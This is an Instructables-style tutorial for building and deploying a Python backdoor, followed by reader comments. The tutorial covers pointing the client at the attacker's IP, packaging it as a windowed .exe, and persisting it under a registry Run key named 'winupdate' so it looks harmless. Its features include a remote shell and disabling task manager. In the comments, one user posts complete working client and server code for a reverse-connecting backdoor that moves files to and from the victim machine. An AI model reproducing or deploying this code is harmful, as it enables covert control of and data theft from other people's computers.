Simple Python Backdoor

Introduction: Simple Python Backdoor

About: Hello, my name is xp4xbox, a really old name that really has nothing to do with xbox consoles. Anyway I enjoy making programs and have several instructables on some of them. So far, I know VBScript, Batch, Pow…

So after almost a year since instructable on my Simple Netcat Backdoor, I was inspired to create a similar but more feature-filled version using the Python programming language simply because its a fairly simple language compared to others. So if you don't know what a backdoor is, its basically a way that allows you to connect to and control someone's computer. This one has many advantages over the netcat one, such as a much simpler install, usage and very easy to use outside of your network. I even included a remote cmd, so you can run any commands as before with this one. Also since the server is now cross-platform, you can now accept connections on a Linux server.

Anyway you can download the latest version here (the only files you will need are the server and client).

NOTE: This program is still a little bit in work in progress, I plan hopefully in the future to include a few more features. This project is also available on the github page.

Step 1: Installing Prerequisites...

So since this program is made in Python 3, you go ahead and download the latest version from here. But you will also need a few modules.

So to install them, you can simply run python -m pip install -r requirements.txt in a command prompt. The "requirements.txt" is the file in the main directory that contains all of the modules needed.

Step 2: Setup...

So to configure the client, open up src/client.py with IDLE or any other editor and you should see the code above as in pic 1.

Anyway, the first thing you need to do is configure to IP address to connect to, so set strHost to be your IP in which the client should connect to such as in pic 2. Or if you plan to use the program with a dns such as from no-ip, which allows you to use the program outside your network, remove the "#" on the line below and fill in your hostname in between the quotes. eg. myserver113.ddns.net.

NOTE: If you plan on using the program outside of your network, you must port forward port 3000. Or if you are using a server though such as one from DigitalOcean, no port forwarding is required :).

Step 3: Build to .exe

In order to allow anyone without python and modules to run the file, you must build the file to an .exe. So to build open up a command prompt and run the following code:

pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed

What this does is exclude the unused tkinter module to save on file size and then creates a single executable.

NOTE: You can add your own icon by adding --icon="icon path"

Step 4: Usage...

Before you can run the server, you must disable your firewall or allow port 3000 in order to accept upcoming connections. After that you can run the server to listen for connections.

Once you get a connection, you can type "--help", and you should get a prompt as in pic 1. Next you can interact with the user by typing "--i client id".

Next, you should see a menu appear as in pic 2, and now you can run any command you want such as "--m" to send a message, "--e" to open remote cmd, etc. You can also use "--b" so you can move the connection to the background and interact with another computer.

As I said, you can do anything you originally did with the netcat backdoor only more.

NOTE: Its always best to do a graceful shutdown by running "--x" in the main menu instead of closing the window.

Step 5: Uninstalling...

If you ever added this program to the startup and want to remove it, simply open up the registry and navigate to "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run". Then delete the value called "winupdate". I gave it a non-suspicious name so that it won't get deleted by accident ;).

Step 6: Explanation...

So I could spend pages writing on how I made every feature, but instead I will explain generally how this entire program works.

So the program works by first having a server listening on a port for upcoming connections from the client, in this case I chose port 3000. Next the client connects to the server using that port and then waits for the server to send it commands. In my case the commands are just simple strings of text such as "dtaskmgr" which basically tells the client to disable task manager. Its very simple actually. The server never communicates directly with the clients PC, instead it communicates with the client which then runs the commands specified.

One more thing about sending data over a socket, is that the data must be sent as bytes which means you will see the server and the client constantly decoding the messages to standard text.

Anyway, that's pretty much all that comes into making backdoor, you will notice I lightly commented out the code, so if you know a little python, it should be a little easy to understand.

Step 7: Done!

Have fun with this program! It can especially be helpful for helping in friends/relatives who do not live closely.

I hope you found this instructable useful and if you have any questions, or concerns please leave a comment or pm me.

Also if you find any bugs in this program, or feel as a feature is missing or would be useful to include, please report it to me.

Please use this program responsibly and legally, I am not responsible for anything you do.

Wireless Contest

Participated in the
Wireless Contest

Be the First to Share

    Recommendations

    • Clocks Speed Challenge

      Clocks Speed Challenge
    • Toys & Games Contest

      Toys & Games Contest
    • Big vs Small Challenge

      Big vs Small Challenge

    28 Comments

    0
    xp4xbox
    xp4xbox

    2 months ago

    Please check Github for the latest version with an easier setup.

    0
    bhuvanalwaysrock
    bhuvanalwaysrock

    Question 5 months ago on Step 7

    I AM GETTING THIS ERROR PLEASE RESOLVE! IF THE ADMIN OF THIS PROJECT WANNA CONTACT ME , THEN I HAVE MESSAGED YOU MY GMAIL ACCOUNT! AND IF AN OTHER CAN RESOLVE MY PROBLEM THEN PLZZ DO IT! THIS ERROR COMES WHEN I OPEN MY CLIENT.EXE

    ERROR.PNG
    0
    xp4xbox
    xp4xbox

    Reply 2 months ago

    Open an issue on the GitHub page.

    0
    safiullah176
    safiullah176

    3 months ago

    Hey,
    i have a problem with --r and --s
    please give me one example , how to use these two tools

    how to put a command for target file and output file,
    this backdoor working perfectly
    thank you

    0
    xp4xbox
    xp4xbox

    Reply 2 months ago

    Target file is path of file you want
    Ouput file is the path of the file that will be transfered

    0
    safiullah176
    safiullah176

    Reply 3 months ago

    finally changing directory working but I am facing upload and download file, kidly check the attachment files
    sometimes upload and download done but show in unknow format

    11.PNG22.PNGIMG_20210201_020520.jpg
    0
    glasmor05
    glasmor05

    7 months ago

    Hey,
    I got a lot of questions for you.
    First one to see if you reply is.
    Can u make a look at my backdoor(these are just 80lines of code in server and backdoor) if you are interested pls reply then I'll send you the code.

    0
    xp4xbox
    xp4xbox

    Reply 7 months ago

    sure

    0
    glasmor05
    glasmor05

    Reply 7 months ago

    If u have Discord pls add me there .
    Vuki#4555

    0
    glasmor05
    glasmor05

    Reply 7 months ago

    Backdoor:

    import socket
    import subprocess
    import os
    # Provide IP address of attacker machine
    ip="0.0.0.0"
    port=8080
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    s.connect((ip,port))
    while True:
    command=s.recv(1024)
    if command == b'exit':
    s.close()
    break

    elif command==b'Startapp':
    App = s.recv(1024)
    App = App.decode()
    os.startfile(App)

    elif command == b'download':
    file_path = s.recv(5000)
    file_path = file_path.decode()
    file = open(file_path,"rb")
    data = file.read()
    s.send(data)
    print("")
    print("File has been sent succsesfully ...")
    print("")

    elif command == b'send_files':
    filename = s.recv(6000)
    print(filename)
    new_file = open(filename, "wb")
    data = s.recv(6000)
    print(data)
    new_file.write(data)
    new_file.close()

    elif command == b'viewcwd':
    files = os.getcwd()
    files = str(files)
    s.send(files.encode())
    print("")
    print("Command has been executed ...")
    print("")

    else:
    print("")
    print("Command not in List !")
    print("")
    0
    glasmor05
    glasmor05

    Reply 7 months ago

    Server :
    #server
    import os
    import socket
    ip="0.0.0.0"
    port=8080
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    s.bind((ip,port))
    s.listen(1)
    conn,addr=s.accept()
    print('[+]Connected to',addr)
    while True:
    command=input("Shell>>")
    if command=='exit':
    conn.send(b'exit')
    conn.close()
    break

    elif command=='Startapp':
    conn.send(b'Startapp')
    App = input(str("Enter App name or Website link : "))
    conn.send(App.encode())
    print("")
    print("Command executet successfully ... ")
    print("")

    elif command=='download':
    conn.send(b'download')
    filepath = input(str("Please enter the right filepath with filename : "))
    conn.send(filepath.encode())
    file = conn.recv(100000)
    filename = input(str("Please enter filname for the incoming file : "))
    new_file = open(filename,"wb")
    new_file.write(file)
    new_file.close
    print("")
    print(filename,"File has been downloaded and saved")
    print("")

    elif command == 'send_files':
    conn.send(b'send_files')
    file = input(str("Please enter the filename and directory : "))
    filename = input(str("Please enetr the file name and directory where the file should be saved: "))
    data = open(file, "rb")
    file_data = data.read(7000)
    conn.send(filename.encode())
    print("")
    print("File has been sent succsessfully ...")
    conn.send(file_data)

    elif command == 'help':
    print("---All availible commands---")
    print("")
    print("help, download, send_files, Startapp, exit")
    print("")
    print("---More commands comming soon---")

    elif command == 'viewcwd':
    conn.send(b'viewcwd')
    print("")
    print("Command sent waiting for execution ...")
    print("")
    files = conn.recv(5000)
    files = files.decode()
    print("Command output : ",files)

    else:
    print("")
    print("Command not in List !")
    print("")
    0
    SHEEPHEAD72
    SHEEPHEAD72

    1 year ago

    Hello, I am having a problem with uploading, downloading and going though directories. Examples when I put in a directory that is 100% right, it just pauses and then says failed to execute script on the victims computer. Now also when I download and upload it seems to work just it just pauses on 'sent' and it never sends.

    0
    glasmor05
    glasmor05

    Reply 7 months ago

    Backdoor:
    import socket
    import subprocess
    import os
    # Provide IP address of attacker machine
    ip="0.0.0.0"
    port=8080
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
    s.connect((ip,port))
    while True:
    command=s.recv(1024)
    if command == b'exit':
    s.close()
    break

    elif command==b'Startapp':
    App = s.recv(1024)
    App = App.decode()
    os.startfile(App)

    elif command == b'download':
    file_path = s.recv(5000)
    file_path = file_path.decode()
    file = open(file_path,"rb")
    data = file.read()
    s.send(data)
    print("")
    print("File has been sent succsesfully ...")
    print("")

    elif command == b'send_files':
    filename = s.recv(6000)
    print(filename)
    new_file = open(filename, "wb")
    data = s.recv(6000)
    print(data)
    new_file.write(data)
    new_file.close()

    elif command == b'viewcwd':
    files = os.getcwd()
    files = str(files)
    s.send(files.encode())
    print("")
    print("Command has been executed ...")
    print("")

    else:
    print("")
    print("Command not in List !")
    print("")
    0
    xp4xbox
    xp4xbox

    Reply 1 year ago

    seems to be a common problem, I'm not sure how to fix it I have never experienced it. Do you experience it with using remote cmd, you should if I am correct

    0
    jvnh723
    jvnh723

    1 year ago on Step 7

    ERROR: Could not find a version that satisfies the requirement pywin32 (from -r requirements.txt (line 1)) (from versions: none)
    ERROR: No matching distribution found for pywin32 (from -r requirements.txt (li

    That's the error that it shows

    0
    xp4xbox
    xp4xbox

    Reply 1 year ago

    Use python v 3.6

    0
    harold.r.e.sinkins
    harold.r.e.sinkins

    2 years ago

    dear xp4xbox

    iv been studding python the hard way book which has been good so far and seen your code and wanted to give it a go but I'm getting no response iv shut off my fire wall opened port 3000 but when I put in

    --e
    I get this response
    Invalid choice, please try again!
    --help
    --l List all connections
    --i Interact with connection
    --e Open remote cmd with connection
    --s Send command to every connection
    --c Close connection
    --x Exit and close all connections
    I get the same for any response for every one can you help please

    0
    xp4xbox
    xp4xbox

    Reply 2 years ago

    You have to add the ID for the client you want to connect to.

    eg. --e 0

    for the first client.

    --e 1

    for the second....

    0
    CarminB
    CarminB

    2 years ago

    Wont run on W10? Any suggestions?

    0
    xp4xbox
    xp4xbox

    Reply 2 years ago

    Im not sure, it works for me.